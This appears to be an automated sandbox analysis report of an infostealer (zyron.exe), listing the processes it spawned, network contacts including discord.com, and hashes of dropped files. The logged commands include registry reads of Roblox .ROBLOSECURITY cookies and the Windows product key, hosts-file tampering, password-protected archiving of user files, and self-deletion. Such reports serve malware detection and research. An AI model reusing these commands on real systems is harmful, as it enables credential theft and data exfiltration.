KwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AFE.tmp" "c:\Users\Admin\AppData\Local\Temp\wywphiwm\CSC923901C5E42B49448D1793F52EDD9E9.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\9ZHOu.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\9ZHOu.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-ukuzh.in udp
US 208.95.112.1:80 ip-api.com tcp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 discord.com tcp

Files

memory/4996-0-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zyron.exe 

MD5 6b9890a680fb22f32d8318ca466145ad
SHA1 69380599cb62403138660cb08c59ece67dc3d388
SHA256 00a2dcab663ed13d838b665b3db093bcc44c610399148a9f643c044c1f90aca9
SHA512 565ce693948c92741c94793e82625bc92c42c407d496519205f475b12131d55e224b21571c0c173507a2a2a4382d2b4d2c0e4a3ad7cba374fa82d79001e5058c

C:\Users\Admin\AppData\Local\Temp\_MEI25842\python312.dll

MD5 2f1072ddd9a88629205e7434ed055b3e
SHA1 20da3188dabe3d5fa33b46bfe671e713e6fa3056
SHA256 d086257a6b36047f35202266c8eb8c1225163bd96b064d31b80f0dbe13da2acf
SHA512 d8dddc30733811ed9a9c4ae83ac8f3fc4d8ba3fa8051d95242fbd432fd5bf24122373ac5eea9fec78f0daf7c1133365f519a13cf3f105636da74820a00a25e9b

C:\Users\Admin\AppData\Local\Temp\_MEI25842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3468-35-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\base_library.zip

MD5 ccee0ea5ba04aa4fcb1d5a19e976b54f
SHA1 f7a31b2223f1579da1418f8bfe679ad5cb8a58f5
SHA256 eeb7f0b3e56b03454868411d5f62f23c1832c27270cee551b9ca7d9d10106b29
SHA512 4f29ac5df211fef941bd953c2d34cb0c769fb78475494746cb584790d9497c02be35322b0c8f5c14fe88d4dd722733eda12496db7a1200224a014043f7d59166

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_ctypes.pyd

MD5 1b06133298f03ff20e5d31cb3b0bca63
SHA1 0678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256 e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA512 18c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc

memory/3468-40-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI25842\sqlite3.dll

MD5 5655f540da3e3bd91402e5e5b09a6d2f
SHA1 d44db47026b330d06fa84128fd9f0241f5752011
SHA256 aa05807dfa35d6fbe1484728110430802a791f3f8723f824696f2d6bd9c5b69a
SHA512 1205dcd5657dcc457f8d02452c47fcb2e7fee108a675aaddc9f7b82d1f2371e38080a6fa0f767524f835c544f129b6f71b2d716180d196b18a9a6dbef6c9bf03

memory/3468-58-0x00007FFF5ED70000-0x00007FFF5ED7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_ssl.pyd

MD5 7b0d6d717535bc48f0176fd6455a133b
SHA1 a3fd5e6495d961eeaa66ccb7b2a8135812210356
SHA256 3e2d13bda93c59fdd1b9bbb2b30c682774e8da4503248e96e0e3c1b0fe588ce7
SHA512 861443c982a821f61bd971f57f65998366f325d084f21636e38f91aaaac752e7dc2b2344f414db3cb7fddec08210cfc197c1815a44e9b726ff5eabe2c62f42f9

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_sqlite3.pyd

MD5 a045491faa0cba94b3230b254db7f2d2
SHA1 11a87b7f872e24bab0b278bd88c514b5788975b1
SHA256 79769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512 a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_socket.pyd

MD5 cd2becb9c6dc5cc632509da8cbd0b15d
SHA1 28a705e779ed0e40651875cb62fa8e07d3e27e10
SHA256 2a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512 fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_queue.pyd

MD5 a56e79b7526129f06c4feacf1f8ed117
SHA1 99f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256 dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512 b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_lzma.pyd

MD5 cf374ecc905c5694986c772d7fc15276
SHA1 a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256 d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
SHA512 0074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_hashlib.pyd

MD5 ee8c405267c3baaa133e2e8d13b28893
SHA1 b048112268f8300b3e47e441c346dea35e55d52a
SHA256 462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512 da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_decimal.pyd

MD5 a6102e46e07e1219f90392d1d89ac4d6
SHA1 425375d377fde63532aa567978c58a1f131a41b1
SHA256 572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA512 27bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_bz2.pyd

MD5 2152fe099ca3e722a8b723ea26df66c6
SHA1 1daaaba933501949e5d0e3d3968f4279dcde617d
SHA256 41eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA512 5168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9

C:\Users\Admin\AppData\Local\Temp\_MEI25842\unicodedata.pyd

MD5 20f206b5b405d837c201b8fb443cfa5a
SHA1 f06b062505f7218d49a1ef0ea65c6212dc4105b0
SHA256 0ae76f7316506bcaa4a59f31817569129fd1baaaba89032953785dbf9f7a7242
SHA512 b36e4af96bef6b8c13d509b66c34f1cdf6ac8830267fabc13a811d7d486d938d798b32b4d195fea762ee550501002674d6681f8985318990b454a5bc5c982088

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI25842\select.pyd

MD5 79bb09417365e9b66c8fb984cbb99950
SHA1 517522dbcbefb65e37e309cb06fed86c5f946d79
SHA256 94f2bac05e32cb3791f66efb3229c932ab71bc3725a417340304219721b0d50d
SHA512 1c2129dd4d8febe2886e122868956ba6032a03b1297da095d3e9c02ab33183d964a8f790086e688b0720ab39aa1e8d0fe91fadbbe99035baf4d7cc5754de9e64

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI25842\blank.aes

MD5 7ce138b2c0b8689475c61d3fa5ece79a
SHA1 70d12f62b136392be850260059a2db6a97e3da58
SHA256 8a4badcec2c7ec8379068eac2711228992745be2effc8b6fa212a1e8d315bfcc
SHA512 6f7a66cfcb860f92b74c4bbc50285a20d6cf14399eae345ca8ccf1fae4377d4f618e6634ba337e1e4e7de21c6b34af589ce8b16293ef85780797c70357122cfb

memory/3468-64-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

memory/3468-70-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-69-0x00007FFF58710000-0x00007FFF58734000-memory.dmp

memory/3468-67-0x00007FFF5ED10000-0x00007FFF5ED29000-memory.dmp

memory/3468-72-0x00007FFF5A790000-0x00007FFF5A7A9000-memory.dmp

memory/3468-81-0x00007FFF54C80000-0x00007FFF54D4D000-memory.dmp

memory/3468-80-0x00007FFF586D0000-0x00007FFF58703000-memory.dmp

memory/3468-83-0x000001E09D2D0000-0x000001E09D7F2000-memory.dmp

memory/3468-86-0x00007FFF5A6A0000-0x00007FFF5A6B4000-memory.dmp

memory/3468-87-0x00007FFF59450000-0x00007FFF5945D000-memory.dmp

memory/3468-90-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

memory/3468-89-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/3468-82-0x00007FFF43410000-0x00007FFF43932000-memory.dmp

memory/3368-100-0x0000019E6F3E0000-0x0000019E6F402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vynxyoog.z2r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3468-79-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

memory/3468-74-0x00007FFF5EB70000-0x00007FFF5EB7D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a77929cd0f9b956d2141b3ec56cbf856
SHA1 8914eaa86d030e28bf0e2cf53d8decdeee8f768c
SHA256 429228741fd395c7dfaaf230da4c25aefec432f9f3e09dfdd01f7ebc2035dd1b
SHA512 3c383f08f7e94816a0099a8042d6bd47292eb1ca23a5e519ab994a9ccce66664586d8d7f16722c289e3004de5f6f656482b703710ff4a2e25c0edd6f8188a254

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.cmdline

MD5 6adefd68020d1ece5b15ed7991002c58
SHA1 be318f057eeb48e6fc12001254b621c6bf297b8d
SHA256 fa023c25caa3ac3453eb9f3cce59bde568dbe8bb3ab6f7eb03a671727df45105
SHA512 73333872b7f738d63fdd6fd1fb57ca0cc980789c3c622f3e94f9b5f0afc9261caa0bb4036e57855732be6bd48356aa82a8642c213c873556225f8bbfe548329e

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\CSC923901C5E42B49448D1793F52EDD9E9.TMP

MD5 421522c2dd985dd258a8beb6d0a5fd38
SHA1 6b99784847414470d0fa44308caee217829bfd7b
SHA256 c501def2fedb9730a93a5ac49b4f2772033ae8173a70ce3bf48ad0da14dd9da9
SHA512 9195f07e0967c41c68f1774ceb456cf6d6319988aaff739288c45f6446a1886a9c679daa4946b0fbd7794054dbb501d9723383ade44e5ec9ff27d6ab1de22686

C:\Users\Admin\AppData\Local\Temp\RES6AFE.tmp

MD5 b689c0af5d7b188175a1de2d26eb0bcd
SHA1 385b36b02ca9f9deb70de1db864ce3a930f28354
SHA256 a8df09ca6457fb847aa80eaabd6e9a831d3378093db79b3e33df84fda3c25894
SHA512 a3adc67a58b794df1c06f316a3898ebf347be780366790cad6be370750828c65df94e59cf5a89866d9f9126074ed489c475f5e742c43071cc9b0602b446ed01c

C:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.dll

MD5 c03a829dbc2fc7d60d554b958cd46e26
SHA1 4e9a656f0032f0bfa4c8b0bf73d4ef022ab3f0c6
SHA256 daa351226accb42f1b79498ca736b081039170af965998838e939fc7b9991a9f
SHA512 9339c8c664079cf3f6ce2098afcb3f517c5ac45ea1a5b6f5d708f260e464c1fe45f1d5a1b65cec1d526c1ad32ea18abca546d08833fe5a617f10aadc29a152be

memory/724-208-0x00000238333B0000-0x00000238333B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2300867e9fc7247f3ee01d6a610b09bb
SHA1 082db2fa341eef1caa595686f60ff5bebc1be068
SHA256 197636b8559e41fc8edf110ae9021a1a49163fbe235a46b9ef7fa75a2013fb09
SHA512 5660891b57f45f5dfcb5f2d2c640ba565a275ca9892323b70495fb737616a92f1c26cfde1db2dc26decf0e5772e9170d52ac775602ffe1524760b4dc45fd7669

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\PingSearch.mp4

MD5 b0863450915dfe80de24d94501e476ed
SHA1 36d8bb081fb6a62fab4330e8c6cd0d9ee9a319dc
SHA256 7404d87361a013cc9c5344d59726a0731f04c0b5fea83db40b055dac7256fdef
SHA512 cab44cbdc462621a5c0c27b1918bebc4feddf4e9fa1490e2ddbbefe86479c65035f3cd908098e3d3f6dbf8a0206c3fec2cd015475f48ae78c2a2295227cbc186

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\PushShow.pdf

MD5 949ac9c0f386b048711467a9c038ba2a
SHA1 99bcd5cdd5bdf227429c6b9a1aa095dd0acd1650
SHA256 59f9e6c34e4e15ac51e82032c67c666fcacde362f7c754fbc7365e244fbeb30b
SHA512 aabe3b722d66945bd2d5b1a53dd452010d19eb90da66121e08e2cdf10d7413eb1aa1b247eec8f67484d02f360e9c217a625db5cc011d32ccec9eccfccbdd624a

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\RequestLock.png

MD5 b56fcd9c74e7de89ba5f50126fd6cc38
SHA1 b6acfcb248c4db9caa3cdb48b6bdcd71fb5d3567
SHA256 10c8f14a671ac0ebd334c5363c8735f6736955f3f1bdece39349e446e50a85bf
SHA512 1541cb4822977d7dfbfeca099c1ea349310ddf1ad202dd253ae16a3963c6e5cb03d53191c06c8debdaca5d6b645f5ec43e26a3b4064c237d75f6393b9960ab18

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\SkipUninstall.mp3

MD5 71f7bca979b6b314a4a4454c565d3048
SHA1 1cee10c82e516319c050da50e1ca75404cf2d84a
SHA256 c54285987193e3f72f986f318d4c9b3f4b6c8aa75e104eefd57b5da120335b42
SHA512 67a1e5e8a37af99d38c0666d33702cba0783eeda513aadcab2c3e87f0b19d11692563433ade9b33fc8813728f029bc9809f305d7badc6e3cecf819df10ab1120

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\DisableSet.txt

MD5 d769711bc7ec7607fb63c97949df9251
SHA1 3f3b711a86a86cc535905abf8438cd67d93b5859
SHA256 696646837785f7589382845de0d4e21b91e1adb5d4643304442d0813422ac16b
SHA512 89bd48ededd3b4f2efd099fb63a383d4508d27c9dc10ca358001b83f6d1314f11adf8b5cf98d64f985564a85e9c980aff573f65179c156271ee34c6970fa3fd2

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\DisableSwitch.pdf

MD5 0a995650e351fe10fab0da147a9737d0
SHA1 4d3c856c556aef4e0b098c4fee75f6922ffc773d
SHA256 37767de1c8ced6bc375a019d85e3fabb41e0831194842e5d495ab15247d5c5a7
SHA512 403f918d6b1ae635eb0e7db51024ea15ede7b269f317e753a27ceeabbe460ee55dab81ef18c11ab11e9a406214eb61dc20b71b7bd708281372515bf6b767e21f

memory/3468-276-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

memory/3468-300-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/4048-316-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-315-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-314-0x00007FFF58710000-0x00007FFF58734000-memory.dmp

memory/3468-310-0x00007FFF43410000-0x00007FFF43932000-memory.dmp

memory/3468-309-0x00007FFF54C80000-0x00007FFF54D4D000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 dd12727f6eef5896f8b6424e3e45d73e
SHA1 d1fdde2cfcc0f5cea9b796029fc3a6c4e3a49a43
SHA256 1f94a11fb992878c244b93ccd7fceae27b6ba02f19630fce3321d4f28211810d
SHA512 37acb4df212a261900eb42338ac410f9fb8b76a82cd09d8a7a9a9fdcf4726fd8f8a338d3f70836b0bea1f17509fb0da936e744b634bb8424bb22833f7d344c7d

memory/3468-308-0x00007FFF586D0000-0x00007FFF58703000-memory.dmp

memory/3468-299-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

memory/3468-313-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

memory/4184-335-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-334-0x000001E09D2D0000-0x000001E09D7F2000-memory.dmp

memory/1620-343-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4184-344-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4048-345-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4996-346-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-364-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/3468-368-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-367-0x00007FFF5ED10000-0x00007FFF5ED29000-memory.dmp

memory/3468-366-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

memory/3468-365-0x00007FFF5ED70000-0x00007FFF5ED7F000-memory.dmp

memory/3468-361-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

